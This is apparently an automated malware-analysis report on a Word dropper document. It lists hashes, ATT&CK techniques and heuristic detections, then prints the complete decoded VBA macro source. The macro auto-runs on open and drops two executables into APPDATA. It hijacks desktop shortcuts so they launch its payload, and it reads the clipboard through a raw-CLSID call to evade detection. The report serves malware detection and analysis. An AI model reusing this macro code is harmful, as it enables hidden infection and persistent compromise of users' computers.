Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eebc056d535f2b12…

MALICIOUS

Office (OLE)

Size: 447.5 KB
Created: 2018-12-04 12:55:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: aab23055f489b5c1feca97a763ef808d
SHA-1: 31742b9b92d8a29540ddb96d3a5efd7f6ccbcdd4
SHA-256: eebc056d535f2b1278df043eee776595b6526e47a6cffdc67641c165b1f5e973
Risk Score: 418

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that execute upon opening the document, leveraging WScript.Shell to create directories and write executables. The Document_Open macro attempts to create a directory named 'lkn' in the APPDATA folder and writes two files, 'werd.exe' and 'wird.exe', into it. It also appears to manipulate shortcut files on the desktop and potentially establish persistence. The ClamAV detection 'Doc.Dropper.Agent-6835541-0' further supports its malicious nature as a dropper.

Heuristics 12

  • ClamAV: Doc.Dropper.Agent-6835541-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6835541-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       Dim shell As Shell32.shell
        Dim folder As Shell32.folder
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim oWsh
    Set oWsh = CreateObject("WScript.Shell")
    strDirPath = oWsh.SpecialFolders("Desktop")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim oWsh
    Set oWsh = CreateObject("WScript.Shell")
    strDirPath = oWsh.SpecialFolders("Desktop")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Function ClipboardText()
        With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
            .GetFromClipboard
  • VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASION
    VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.
    Matched line in script
    Function ClipboardText()
        With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
            .GetFromClipboard
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Option Explicit
    Private Sub Document_Open()
    On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    gdffs = Environ("APPDATA") & "\"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5181 bytes
SHA-256: 7c7edaeeb8c960f377ddaf9c475f0dd36d74b102f469d2f718e37072695ace76
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Open()
On Error Resume Next
Dim gdffs

gdffs = Environ("APPDATA") & "\"

 If Dir(gdffs & "lkn", vbDirectory) = "" Then
                Open gdffs & "werd.exe" For Output As #1
    Print #1, HexToString(UserForm1.TextBox1.text)
    Close #1
    
          Open gdffs & "wird.exe" For Output As #1
    Print #1, HexToString(UserForm2.TextBox1.text)
       Close #1
    Call finds
    Else

    End If
    
   
   End Sub


Sub finds()
On Error Resume Next
Dim strDirPath, strMaskSearch, strFileName As String
Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")
strMaskSearch = "*.lnk*"


Dim s As String, s2 As String

    s = Environ("APPDATA") & "\lkn"

      MkDir s

Dim fso As Object
Set fso = VBA.CreateObject("Scripting.FileSystemObject")




Dim gdffs, iStr1

gdffs = Environ("APPDATA")
 iStr1 = Left(gdffs, 3) & "users\public\desktop"
strFileName = Dir(iStr1 & "/" & strMaskSearch)

Do While strFileName <> ""

Call kk(iStr1 & "\" & strFileName, s & "\" & strFileName, strDirPath & "\" & strFileName)

    strFileName = Dir
Loop






strFileName = Dir(strDirPath & "/" & strMaskSearch)

Do While strFileName <> ""


FileCopy oWsh.SpecialFolders("Desktop") & "\" & strFileName, s & "\" & strFileName
Call MakeShortcut(strFileName, strFileName, s & "\" & strFileName, oWsh.SpecialFolders("De" & "skt" & "op"))
  ' MsgBox strFileName

    strFileName = Dir
Loop
    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
  ActiveDocument.Save
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Sub MakeShortcut(pod, gfdgd, jojj, hhhhh)
Dim a, b, c, f, pos, pis, pas, pus, ppp, txt

Selection.InsertFile FileName:=jojj, Range:="", _
        ConfirmConversions:=False, Link:=False, Attachment:=False

    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
    txt = ClipboardText


   Dim sss, aaa, aaaa, ssss, aa, aas, aad
    
    ssss = InStr(1, txt, ":\")
    aaaa = InStr(ssss + 5, txt, ":\")
    aa = Mid(txt, aaaa - 1)
    aas = Left(aa, 100)
    sss = InStr(1, aas, ".e" & "xe")
    aad = Left(aa, sss + 3)


Dim kkk, xxx, ccc, vvv, bbb, nnn

kkk = InStr(sss - 20, aad, "\")

xxx = InStr(kkk + 1, aad, "\")


If xxx <> 0 Then
ccc = Mid(aad, xxx + 1)

Else
ccc = Mid(aad, kkk + 1)

End If

Dim oWsh
Dim myshortcut
Dim oShortcut
Dim strSplitFileName
Dim strTarget
Dim nShortName, strDirPath

Set oWsh = CreateObject("WScript.Shell")

strDirPath = oWsh.SpecialFolders("Desktop")


     Dim fsdf As String
     fsdf = Environ("APPDATA") & "\wird.exe"




   Dim shell As Shell32.shell
    Dim folder As Shell32.folder
    Dim folderItem As Shell32.folderItem
    Dim shortcut As Shell32.ShellLinkObject
    
    Set shell = New Shell32.shell
    
    Set folder = shell.NameSpace(strDirPath)
    If Not folder Is Nothing Then
        Set folderItem = folder.ParseName(pod)
        If Not folderItem Is Nothing Then
            Set shortcut = folderItem.GetLink
            If Not shortcut Is Nothing Then
                shortcut.Path = fsdf
        
 

   shortcut.Arguments = """" & ccc & """" & " " & """" & jojj & """"
                shortcut.SetIconLocation aad, 0
                 shortcut.Save
            End If
        End If
    End If
    
    
    

Set oWsh = Nothing
Set oShortcut = Nothing




End Sub

Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard
        ClipboardText = .GetText
    End With
End Function


Public Function HexToString(ByVal HexToStr As String) As String

Dim strTemp   As String
Dim strReturn As String
Dim i As Long

For i = 1 To Len(HexToStr) Step 2
    strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
    strReturn = strReturn & strTemp
Next i
HexToString = Right(strReturn, Len(strReturn))
End Function


Sub kk(aa, bb, cc)
FileCopy aa, bb
     Kill aa
FileCopy bb, cc

End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{2FE1C736-3596-4292-A45E-D40528CDDC22}{2FF996D0-DEC1-47D6-B492-1FE8A3AE7AA7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{FB712FD2-D570-45CF-830F-5C9E410D200F}{A03F4036-9292-435F-8C77-C316FF73F1E5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False